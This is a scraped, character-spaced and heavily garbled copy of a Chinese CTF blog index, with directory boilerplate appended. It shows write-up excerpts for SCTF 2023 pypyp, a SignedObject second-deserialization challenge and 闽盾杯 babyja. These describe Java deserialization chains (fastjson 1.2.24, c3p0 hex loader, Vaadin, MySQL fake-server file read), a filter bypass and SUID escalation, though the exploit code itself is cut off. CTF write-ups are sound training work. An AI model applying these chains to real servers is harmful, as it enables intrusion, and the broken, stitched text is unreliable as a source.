3 S C T F p y p y p ? 题 目 镜 像 ： l x x x i n / s c t f 2 0 2 3 _ p y p y p f l a g 信 息 ： / f l a g （ 需 要 S U I D 提 权 ） 内 部 端 口 ： 8 0 题 目 描 述 ： a p i e c e o f c a k e b u t h a r d w o r k 。 p e r 5 m i n r e s t a r t . p a y a t t e n t i o n t o / a p p / a p p . p y 启 动 脚 本 1 d o c k e r r u n i t d p 1 2 3 4 5 : 8 0 e F L A G = f l a g l x x x i n / s c t f 2 0 2 3 _ p y p y p W r i t e U p 打 开 题 目 显 示 没 有 s e s s i o n 可 以 利 用 S E S S I O N _ U P L O A D _ P R O G R E S S 创 建 一 个 s e s s i o n ： 下 方 的 p r o x i e s 为 B u r p S u i t e 的 代 理 地 址 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 i m p o r t r e q u e s t s u r l = h t t p : / / 1 . 1 . 1 . 1 : 4 9 3 4 3 / d a t a = f i l e = c o o k i e s = p r o x i e s = l x x x i n / d f j k 2 0 2 3 _ b a b y u r l W r i t e U p S i g n e d O b j e c t 二 次 反 序 列 化 该 打 法 仅 能 列 目 录 读 文 件 ， 比 赛 时 可 以 直 接 读 文 件 获 得 f l a g ， 本 镜 像 的 f l a g 需 要 s u i d 提 权 后 才 能 读 到 ， 如 果 仅 想 复 现 该 打 法 ， 进 入 容 器 给 / f l a g 赋 读 权 限 即 可 下 载 附 件 ， 反 编 译 ， 文 件 结 构 如 下 ： 在 I n d e x C o n t r o l l e r 中 的 / h a c k 路 由 中 有 反 序 列 化 入 口 这 里 反 序 列 化 是 自 定 义 对 象 输 入 流 ， 把 U R L V i s i t e r 和 U R L H e l p e r 过 滤 掉 了 / f i l e 路 由 会 读 取 / t m p / f i l e 的 内 容 并 返 回 在 U R L H e l p e r 类 中 有 个 反 序 列 化 入 口 由 于 U R L H e l p e r 类 被 过 滤 了 ， 无 法 直 接 反 序 列 化 ， 不 过 可 以 二 次 反 序 列 化 S i g n O b j e c t # g e t O b j e c t 会 触 发 二 次 反 序 列 化 接 下 来 问 题 就 转 换 成 如 何 调 用 S i g n O b j e c t # g e t O b j e c t 这 个 考 点 在 2 0 2 3 阿 里 云 C T F 的 B y p a s s i t 1 有 考 察 过 2 0 2 3 阿 里 云 C T F B y p a s s i t 1 本 地 重 写 一 下 B a s e J s o n N o d e � 类 ， 把 w r i t e R e p l a c e 方 法 删 除 掉 才 能 正 常 反 序 列 化 完 整 的 P o C 如 下 ： 在 U R L H e l p e r 中 会 对 传 入 的 u r l 做 校 验 ， 不 过 用 的 是 m y u r l . s t a r t s W i t h ( f i l e ) 方 式 校 验 ， 可 以 通 过 大 写 绕 过 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 2 0 2 1 2 2 2 3 2 4 2 5 2 6 2 7 2 8 2 9 3 0 3 1 3 2 3 3 3 4 3 5 3 6 3 7 3 8 3 9 4 0 4 1 4 2 4 3 4 4 4 5 i m p o r t c o m . R e a d M o r e 2 0 2 3 闽 盾 杯 初 赛 b a b y j a L x x x   p u b l i s h e d o n 2 0 2 3 0 8 1 3 题 目 信 息 题 目 名 称 ： 2 0 2 3 闽 盾 杯 初 赛 b a b y j a d o c k e r 镜 像 ： l x x x i n / m d b 2 0 2 3 _ b a b y j a f l a g 信 息 ： / f l a g . t x t 内 部 端 口 ： 8 0 8 0 附 件 ： 关 卡 4 . z i p 启 动 脚 本 1 d o c k e r r u n i t d p 1 2 3 4 5 : 8 0 8 0 e F L A G = f l a g l x x x i n / m d b 2 0 2 3 _ b a b y j a W r i t e U p 下 载 附 件 ， 反 编 译 先 看 依 赖 ， 用 了 v a a d i n 、 f a s t j s o n 、 c 3 p 0 、 m y s q l j d b c ， 这 里 用 的 每 个 组 件 都 是 存 在 漏 洞 的 再 看 控 制 器 部 分 ， 其 中 / a d m i n / 路 由 存 在 J S O N 解 析 ， 需 要 传 入 d a t a 参 数 （ 参 数 值 需 b a s e 6 4 编 码 ） ， 这 里 就 是 入 口 点 了 在 J S O N 解 析 前 ， 会 在 S e c u r i t y C h e c k 类 中 做 匹 配 ： 题 目 用 的 f a s t j s o n 是 1 . 2 . 2 4 版 本 （ 算 是 比 较 旧 的 版 本 了 ） ， 过 滤 了 T e m p l a t e s I m p l 、 J d b c R o w S e t I m p l 等 常 用 的 s i n k 点 不 过 题 目 还 提 供 了 M y B e a n 类 ， M y B e a n # g e t C o n n e c t i o n 会 做 J D B C 连 接 由 于 题 目 使 用 的 f a s t j s o n 1 . 2 . 2 4 ， 无 法 直 接 通 过 p a r s e 调 用 g e t t e r 方 法 ， 在 f a s t j s o n 1 . 2 . 4 7 以 后 可 以 通 过 p a r s e 调 用 g e t t e r 方 法 （ 如 果 要 调 用 开 发 者 自 定 义 类 的 g e t t e r 需 要 开 启 A u t o T y p e S u p p o r t 选 项 ， 挺 鸡 肋 的 ） 不 过 题 目 还 用 了 一 个 v a a d i n 依 赖 ， 该 依 赖 也 存 在 反 序 列 化 漏 洞 ， 可 以 反 射 调 用 任 意 类 的 所 有 g e t t e r 方 法 ， 具 体 v a a d i n 反 序 列 化 流 程 参 考 s u 1 8 👴 🏻 的 博 客 ： J a v a 反 序 列 化 漏 洞 （ 五 ） R O M E / B e a n S h e l l / C 3 P 0 / C l o j u r e / C l i c k / V a a d i n | 素 十 八 题 目 还 用 了 S p r i n g S e c u r i t y 对 / a d m i n 下 的 路 由 做 权 限 验 证 ， 不 过 账 号 密 码 硬 编 码 在 代 码 中 ， 可 以 直 接 登 录 使 用 ： 整 理 一 下 ， 完 整 的 攻 击 思 路 如 下 ： 首 先 用 账 号 密 码 登 录 到 后 台 访 问 / a d m i n / 路 由 ， P O S T 传 入 d a t a 参 数 服 务 端 对 传 入 的 d a t a 参 数 b a s e 6 4 解 码 ， 并 调 用 f a s t j s o n 的 p a r s e 解 析 题 目 中 存 在 f a s t j s o n 1 . 2 . 2 4 依 赖 ， 这 里 我 们 用 f a s t j s o n 1 . 2 . 4 7 的 p a y l o a d 打 c 3 p 0 ， 通 常 f a s t j s o n 打 c 3 p 0 都 是 打 j n d i ， 不 过 题 目 过 滤 掉 了 j n d i ， 这 里 打 c 3 p 0 的 W r a p p e r C o n n e c t i o n P o o l D a t a S o u r c e ， 也 就 是 打 H E X 序 列 化 字 节 加 载 器 二 次 反 序 列 化 二 次 反 序 列 化 内 容 是 v a a d i n 依 赖 打 M y B e a n # g e t C o n n e c t i o n 触 发 J D B C 连 接 读 目 录 ， 再 读 文 件 内 容 完 整 的 E X P 如 下 ： 虽 然 题 目 过 滤 了 B a d A t t r i b u t e V a l u e E x p E x c e p t i o n 字 符 串 ， 但 是 没 有 过 滤 其 十 六 进 制 值 ， 因 此 可 以 使 用 B a d A t t r i b u t e V a l u e E x p E x c e p t i o n 类 ， 题 目 黑 名 单 过 滤 的 5 4 6 5 6 D 7 0 6 C 6 1 7 4 6 5 7 3 4 9 6 D 7 0 6 C 是 T e m p l a t e s I m p l 类 u s e r = f i l e r e a d _ f i l e : / / / . 用 于 列 出 / 目 录 下 所 有 文 件 ， 具 体 用 法 可 参 考 ： h t t p s : / / g i t h u b . c o m / f n m s d / M y S Q L _ F a k e _ S e r v e r 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 2 0 2 1 2 2 2 3 2 4 2 5 2 6 2 7 2 8 2 9 3 0 3 1 3 2 3 3 3 4 3 5 3 6 3 7 3 8 3 9 4 0 4 1 4 2 4 3 4 4 4 5 4 6 4 7 4 8 4 9 i m p o r t j a v a x . R e a d M o r e 2 0 1 8 2 0 2 3   |   浙 I C P 备 2 0 2 1 0 2 0 5 7 2 号 1

站点概括

关于www.xiinnn.com说明：
www.xiinnn.com由网友主动性提交被整理收录的，仅提供www.xiinnn.com的基础信息并免费向大众网友展示，www.xiinnn.com的是IP地址：- 地址：-，www.xiinnn.com的百度权重为0、百度手机权重为0、百度收录为0条、360收录为0条、搜狗收录为0条、谷歌收录为0条、百度来访流量大约在-之间、百度手机端来访流量大约在-之间、www.xiinnn.com的备案号是-、备案人叫-、被百度收录的关键词有0个、手机端关键词有0个、该站点迄今为止已经创建未知。

内容声明：

1、本站收录的内容来源于大数据收集，版权归原网站所有！
2、本站收录的内容若侵害到您的利益，请联系我们进行删除处理！
3、本站不接受违规信息，如您发现违规内容，请联系我们进行清除处理！
4、本文地址：https://www.xingzitai.com/xxzddh/3f928e7caafd89531dae.html，复制请保留版权链接！

---